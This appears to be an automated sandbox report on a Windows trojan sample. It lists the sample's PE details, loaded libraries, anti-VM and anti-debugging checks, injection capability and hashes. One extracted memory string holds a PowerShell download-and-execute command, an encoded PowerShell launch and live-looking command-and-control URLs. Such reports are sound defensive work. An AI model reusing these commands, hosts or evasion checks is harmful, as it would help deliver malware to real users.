Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: sspicli.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_008F1300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_02B885F0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B885F0

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B885F0

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|qE2PyNqQStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://79.124.78.45/hockamore.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.clubedasluluzinhasro.com.br/assets/image/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008F695B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_008F1300

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F1710 mov ecx, dword ptr fs:[00000030h]	0_2_008F1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F75A2 mov eax, dword ptr fs:[00000030h]	0_2_008F75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F9763 mov eax, dword ptr fs:[00000030h]	0_2_008F9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B87620 mov eax, dword ptr fs:[00000030h]	0_2_02B87620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B85E10 mov eax, dword ptr fs:[00000030h]	0_2_02B85E10

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008FA845 GetProcessHeap,

0_2_008FA845

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008F3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F43AF SetUnhandledExceptionFilter,	0_2_008F43AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B85AB0

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F44C5 cpuid

0_2_008F44C5

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008F4103

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B885F0

ID:	1428896
Product:	CloudBasic
Start time:	19:29:07
Start date:	19.04.2024
Sample:	SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6d36580feee622f41b2ab6bfe79a8f5e
SHA1:	93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7
SHA256:	3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe